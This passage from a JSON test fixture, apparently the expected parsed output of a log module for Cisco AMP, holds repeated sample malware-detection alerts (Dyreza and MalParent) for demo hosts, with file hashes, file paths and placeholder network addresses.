"cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:15:52.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176258629159616595", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" - ], - "cisco.amp.timestamp_nanoseconds": 649000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6176258629159617000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", - "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", - "input.type": "log", - "log.offset": 228792, - "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" - ], - "related.hosts": [ - "Demo_Dyre" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:15:40.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176258577620009042", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" - ], - "cisco.amp.timestamp_nanoseconds": 637000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6176258577620009000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", - "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", - "input.type": "log", - "log.offset": 230111, - "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" - ], - "related.hosts": [ - "Demo_Dyre" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:15:28.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176258526080401489", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" - ], - "cisco.amp.timestamp_nanoseconds": 609000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6176258526080401000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", - "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", - "input.type": "log", - "log.offset": 231430, - "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" - ], - "related.hosts": [ - "Demo_Dyre" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:15:16.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176258474540793936", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" - ], - "cisco.amp.timestamp_nanoseconds": 987000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6176258474540794000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", - "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", - "input.type": "log", - "log.offset": 232749, - "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" - ], - "related.hosts": [ - "Demo_Dyre" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:15:04.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176258423001186383", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" - ], - "cisco.amp.timestamp_nanoseconds": 959000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6176258423001186000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", - "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", - "input.type": "log", - "log.offset": 234068, - "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" - ], - "related.hosts": [ - "Demo_Dyre" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:14:55.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "63:5f:47:2b:89:91" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.File.MalParent", - "cisco.amp.detection_id": "6533668103677542427", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "63:5f:47:2b:89:91" - ], - "cisco.amp.timestamp_nanoseconds": 470000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6533668103677542000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", - "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", - "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "file.name": "ekjrngjker.exe", - "file.path": "\\\\?\\C:\\ekjrngjker.exe", - "fileset.name": "amp", - "host.hostname": "Demo_AMP_Threat_Audit", - "host.name": "Demo_AMP_Threat_Audit", - "host.os.family": "windows", - "host.os.platform": "windows", - "host.user.name": "user@testdomain.com", - "input.type": "log", - "log.offset": 235387, - "related.hash": [ - "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "b99e0a8c56f963246b6464b9fffbf7a2", - "b024546a49bad1bd60fccef0a5d11b55f9a442c4" - ], - "related.hosts": [ - "Demo_AMP_Threat_Audit" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "related.user": [ - "user@testdomain.com" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:14:54.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "63:5f:47:2b:89:91" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.File.MalParent", - "cisco.amp.detection_id": "6533668099382575128", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "63:5f:47:2b:89:91" - ], - "cisco.amp.timestamp_nanoseconds": 696000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6533668099382575000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", - "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", - "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "file.name": "ekjrngjker.exe", - "file.path": "C:\\ekjrngjker.exe", - "fileset.name": "amp", - "host.hostname": "Demo_AMP_Threat_Audit", - "host.name": "Demo_AMP_Threat_Audit", - "host.user.name": "user@testdomain.com", - "input.type": "log", - "log.offset": 239357, - "related.hash": [ - "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "b99e0a8c56f963246b6464b9fffbf7a2", - "b024546a49bad1bd60fccef0a5d11b55f9a442c4" - ], - "related.hosts": [ - "Demo_AMP_Threat_Audit" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "related.user": [ - "user@testdomain.com" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:14:52.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176258371461578830", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" - ], - "cisco.amp.timestamp_nanoseconds": 947000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6176258371461579000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", - "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", - "input.type": "log", - "log.offset": 240676, - "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" - ], - "related.hosts": [ - "Demo_Dyre" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:14:41.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176258324216938573", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" - ], - "cisco.amp.timestamp_nanoseconds": 403000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6176258324216938000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", - "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", - "input.type": "log", - "log.offset": 241995, - "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" - ], - "related.hosts": [ - "Demo_Dyre" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:14:29.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176258272677331020", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" - ], - "cisco.amp.timestamp_nanoseconds": 298000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6176258272677331000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", - "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", - "input.type": "log", - "log.offset": 243314, - "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" - ], - "related.hosts": [ - "Demo_Dyre" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:14:17.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176258221137723467", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" - ], - "cisco.amp.timestamp_nanoseconds": 270000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6176258221137723000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", - "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", - "input.type": "log", - "log.offset": 244633, - "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" - ], - "related.hosts": [ - "Demo_Dyre" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:14:05.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176258169598115914", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" - ], - "cisco.amp.timestamp_nanoseconds": 648000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6176258169598116000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", - "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", - "input.type": "log", - "log.offset": 245952, - "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" - ], - "related.hosts": [ - "Demo_Dyre" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:13:54.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "63:5f:47:2b:89:91" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.File.MalParent", - "cisco.amp.detection_id": "6533667841684537367", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "63:5f:47:2b:89:91" - ], - "cisco.amp.timestamp_nanoseconds": 532000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6533667841684537000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", - "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", - "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "file.name": "ekjrngjker.exe", - "file.path": "\\\\?\\C:\\ekjrngjker.exe", - "fileset.name": "amp", - "host.hostname": "Demo_AMP_Threat_Audit", - "host.name": "Demo_AMP_Threat_Audit", - "host.os.family": "windows", - "host.os.platform": "windows", - "host.user.name": "user@testdomain.com", - "input.type": "log", - "log.offset": 247271, - "related.hash": [ - "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "b99e0a8c56f963246b6464b9fffbf7a2", - "b024546a49bad1bd60fccef0a5d11b55f9a442c4" - ], - "related.hosts": [ - "Demo_AMP_Threat_Audit" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "related.user": [ - "user@testdomain.com" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:13:53.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176258118058508361", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" - ], - "cisco.amp.timestamp_nanoseconds": 636000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6176258118058508000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", - "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", - "input.type": "log", - "log.offset": 251240, - "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" - ], - "related.hosts": [ - "Demo_Dyre" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:13:53.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "63:5f:47:2b:89:91" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.File.MalParent", - "cisco.amp.detection_id": "6533667837389570068", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "63:5f:47:2b:89:91" - ], - "cisco.amp.timestamp_nanoseconds": 689000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6533667837389570000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", - "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", - "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "file.name": "ekjrngjker.exe", - "file.path": "C:\\ekjrngjker.exe", - "fileset.name": "amp", - "host.hostname": "Demo_AMP_Threat_Audit", - "host.name": "Demo_AMP_Threat_Audit", - "host.user.name": "user@testdomain.com", - "input.type": "log", - "log.offset": 252559, - "related.hash": [ - "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "b99e0a8c56f963246b6464b9fffbf7a2", - "b024546a49bad1bd60fccef0a5d11b55f9a442c4" - ], - "related.hosts": [ - "Demo_AMP_Threat_Audit" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "related.user": [ - "user@testdomain.com" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:13:41.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176258066518900808", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" - ], - "cisco.amp.timestamp_nanoseconds": 608000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6176258066518901000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", - "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", - "input.type": "log", - "log.offset": 253878, - "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" - ], - "related.hosts": [ - "Demo_Dyre" 